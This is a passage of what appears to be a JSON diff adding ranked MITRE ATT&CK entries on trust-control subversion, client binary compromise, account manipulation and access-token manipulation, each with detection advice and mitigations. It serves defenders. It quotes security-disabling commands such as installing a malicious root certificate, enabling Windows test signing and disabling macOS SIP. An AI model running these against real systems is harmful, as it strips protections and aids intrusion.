  • Modifying the DLL and Function Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
    • \n
  • Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
    • \n
\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)", + "url": "https://attack.mitre.org/techniques/T1553/003", + "detection": "Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)\nEnable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)\nUtilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)\n
    \n
  • HKLM\\SOFTWARE\\Microsoft\\Cryptography\\OID
    • \n
  • HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID
    • \n
  • HKLM\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\Trust
    • \n
  • HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers\\Trust
    • \n
\nNote: As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using Regsvr32. (Citation: SpectorOps Subverting Trust Sept 2017)\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1553.004", + "name": "Subvert Trust Controls: Install Root Certificate", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)\nAtypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide Adversary-in-the-Middle capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)\nRoot certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)\nIn macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)", + "url": "https://attack.mitre.org/techniques/T1553/004", + "detection": "A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (sigcheck[64].exe -tuv) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)\nInstalled root certificates are located in the Registry under HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Root\\Certificates\\ and [HKLM or HKCU]\\Software[\\Policies]\\Microsoft\\SystemCertificates\\Root\\Certificates\\. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)\n
    \n
  • 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
    • \n
  • 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
    • \n
  • 3B1EFD3A66EA28B16697394703A72CA340A05BD5
    • \n
  • 7F88CD7223F3C813818C994614A89C99FA3B5247
    • \n
  • 8F43288AD272F3103B6FB1428485EA3014C0BCFE
    • \n
  • A43489159A520F0D93D032CCAF37E7FE20A8B419
    • \n
  • BE36A4562FB2EE05DBB3D32323ADF445084ED656
    • \n
  • CDD4EEAE6000AC7F40C3802C171E30148030C072
    • \n
", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + }, + { + "tid": "T1553.005", + "name": "Subvert Trust Controls: Mark-of-the-Web Bypass", + "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)", + "url": "https://attack.mitre.org/techniques/T1553/005", + "detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", + "mitigations": [ + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1553.006", + "name": "Subvert Trust Controls: Code Signing Policy Modification", + "description": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. \nSome of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\nAdversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, Modify Registry, rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include bcdedit.exe -set TESTSIGNING ON on Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)\nTo gain access to kernel memory to modify variables related to signature checks, such as modifying g_CiOptions to disable Driver Signature Enforcement, adversaries may conduct Exploitation for Privilege Escalation using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)", + "url": "https://attack.mitre.org/techniques/T1553/006", + "detection": "Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as HKCU\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing. Modifications to the code signing policy of a system are likely to be rare.", + "mitigations": [ + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1046", + "name": "Boot Integrity", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "url": "https://attack.mitre.org/mitigations/M1046" + } + ] + } + ] + }, + { + "rank": 71, + "tid": "T1554", + "name": "Compromise Client Software Binary", + "description": "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers.\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.", + "url": "https://attack.mitre.org/techniques/T1554", + "detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.", + "score": 0.8795333333333333, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + } + ], + "subtechniques": [] + }, + { + "rank": 72, + "tid": "T1098", + "name": "Account Manipulation", + "description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.", + "url": "https://attack.mitre.org/techniques/T1098", + "detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.", + "score": 0.8789258614285713, + "network_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ], + "subtechniques": [ + { + "tid": "T1098.001", + "name": "Account Manipulation: Additional Cloud Credentials", + "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\nAdversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through Cloud Accounts, adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)", + "url": "https://attack.mitre.org/techniques/T1098/001", + "detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1098.002", + "name": "Account Manipulation: Exchange Email Delegate Permissions", + "description": "Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: Internal Spearphishing), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)", + "url": "https://attack.mitre.org/techniques/T1098/002", + "detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1098.003", + "name": "Account Manipulation: Add Office 365 Global Administrator Role", + "description": "An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) \nThis account modification may immediately follow Create Account or other malicious account activity.", + "url": "https://attack.mitre.org/techniques/T1098/003", + "detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + } + ] + }, + { + "tid": "T1098.004", + "name": "Account Manipulation: SSH Authorized Keys", + "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)", + "url": "https://attack.mitre.org/techniques/T1098/004", + "detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 73, + "tid": "T1134", + "name": "Access Token Manipulation", + "description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. Token Impersonation/Theft) or used to spawn a new process (i.e. Create Process with Token). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", + "url": "https://attack.mitre.org/techniques/T1134", + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. \nThere are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., LogonUser (Citation: Microsoft LogonUser), DuplicateTokenEx(Citation: Microsoft DuplicateTokenEx), and ImpersonateLoggedOnUser(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.\nQuery systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)\nLook for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.", + "score": 0.8596264901209525, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ], + "subtechniques": [ + { + "tid": "T1134.001", + "name": "Access Token Manipulation: Token Impersonation/Theft", + "description": "Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using DuplicateToken(Ex). The token can then be used with ImpersonateLoggedOnUser to allow the calling thread to impersonate a logged on user's security context, or with SetThreadToken to assign the impersonated token to a thread.\nAn adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.", + "url": "https://attack.mitre.org/techniques/T1134/001", + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\nAnalysts can also monitor for use of Windows APIs such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1134.002", + "name": "Access Token Manipulation: Create Process with Token", + "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as Token Impersonation/Theft or Make and Impersonate Token).", + "url": "https://attack.mitre.org/techniques/T1134/002", + "detection": "If an adversary is using a standard command-line shell (i.e. Windows Command Shell), analysts may detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command or similar artifacts. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts may detect token manipulation only through careful analysis of user activity, examination of running processes, and correlation with other endpoint and network behavior.\nAnalysts can also monitor for use of Windows APIs such as CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1134.003", + "name": "Access Token Manipulation: Make and Impersonate Token", + "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.", + "url": "https://attack.mitre.org/techniques/T1134/003", + "detection": "If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)\nIf an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.\nAnalysts can also monitor for use of Windows APIs such as LogonUser and SetThreadToken and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1134.004", + "name": "Access Token Manipulation: Parent PID Spoofing", + "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be explorer.exe rather than an Office document delivered as part of Spearphishing Attachment.(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", + "url": "https://attack.mitre.org/techniques/T1134/004", + "detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", + "mitigations": [] + }, + { + "tid": "T1134.005", + "name": "Access Token Manipulation: SID-History Injection", + "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral 